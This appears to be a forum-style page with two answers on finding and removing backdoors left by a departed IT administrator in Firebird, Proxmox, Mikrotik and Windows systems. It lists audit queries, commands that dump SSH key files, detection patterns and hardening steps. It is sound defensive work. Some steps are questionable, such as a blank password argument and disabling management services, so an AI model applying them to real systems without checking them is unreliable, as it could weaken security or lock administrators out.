How to Detect and Remove Backdoors in Firebird DB, Proxmox, and Mikrotik Systems After IT Personnel Departure


2 views

When a skilled IT professional with system-level access leaves under questionable circumstances, the risk of hidden backdoors becomes significant. The combination of Firebird DB, Proxmox virtualization, and Mikrotik networking equipment presents multiple potential attack vectors that need thorough examination.

Firebird Database Backdoors:
Check for suspicious stored procedures or triggers that might exfiltrate data:


SELECT RDB$PROCEDURE_NAME, RDB$PROCEDURE_SOURCE 
FROM RDB$PROCEDURES 
WHERE RDB$SYSTEM_FLAG = 0 
AND RDB$PROCEDURE_SOURCE LIKE '%EXECUTE BLOCK%';

Proxmox Virtual Environment:
Audit all cron jobs and API tokens:


grep -r "pvesh" /etc/cron*
pvesh get /access/users --enabled 1

For Mikrotik routers, check for hidden scripts or scheduled tasks:


/system script print
/system scheduler print
/ip firewall filter print where comment~"backdoor"

Look for unusual scheduled tasks or WMI event subscriptions:


Get-ScheduledTask | Where { $_.Author -notmatch "Microsoft|Administrator" }
Get-WmiObject -Namespace root\subscription -Class __EventFilter

Consider using these tools for comprehensive scanning:

  • Lynis for Linux system auditing
  • OSSEC for host-based intrusion detection
  • Metasploit's post-exploitation modules for backdoor detection

Implement these security measures immediately:


# Firebird DB
ALTER DATABASE SET DEFAULT SQL SECURITY DEFINER;

# Proxmox
pveum role add Auditor -privs "Audit,System.Console"
pveum user add auditor@pve --password 

# Mikrotik
/ip service disable telnet,ftp,www-ssl,api-ssl

Set up centralized logging with ELK stack and configure alerts for:

  • Unusual database query patterns
  • Authentication attempts from unexpected locations
  • Changes to critical system files

When taking over IT systems from a disgruntled former employee, especially one with advanced programming skills, you're facing a multi-layered security challenge. The combination of Firebird DB, Windows Server 2008 R2 virtualization, Proxmox, and Mikrotik devices creates multiple potential attack surfaces.

First, implement these critical checks without service disruption:

# Check for unusual cron jobs or scheduled tasks
Get-ScheduledTask | Where-Object {$_.Author -notlike "*SYSTEM*" -and $_.Author -ne "Microsoft Corporation"}

# Audit SSH authorized_keys files
find / -name "authorized_keys" -exec ls -la {} \; -exec cat {} \;

# Verify Mikrotik user accounts
/user print detail where name!="admin"

For Firebird and SQL Server, examine these potential attack vectors:

-- Check for suspicious stored procedures
SELECT RDB$PROCEDURE_NAME FROM RDB$PROCEDURES 
WHERE RDB$SYSTEM_FLAG = 0 AND RDB$PROCEDURE_NAME LIKE '%shell%'

-- SQL Server trigger audit
SELECT name, type_desc, create_date, modify_date 
FROM sys.triggers
ORDER BY create_date DESC

Given the former admin's reverse-engineering skills, scan for modified binaries:

# Using FLOSS to extract strings from suspicious binaries
floss -q --no-static-strings /path/to/suspected_binary

# Check ELF binaries for unexpected library dependencies
ldd /usr/bin/* | grep -i "\.so"

The virtualization layer requires special attention:

  • Audit all VMs for unusual network configurations
  • Check for modified qemu-server configuration files
  • Verify backup integrity checksums

For Mikrotik devices, implement these commands immediately:

/ip service disable telnet,ftp,www
/ip firewall filter add chain=input protocol=tcp dst-port=8291 action=drop

Deploy these tools for continuous monitoring:

  • Osquery for endpoint visibility
  • Wazuh for log analysis
  • Rkhunter for rootkit detection

If you find multiple indicators of compromise, especially in:

  • Core system binaries
  • Database schemas
  • Authentication systems

A complete rebuild becomes the safest option.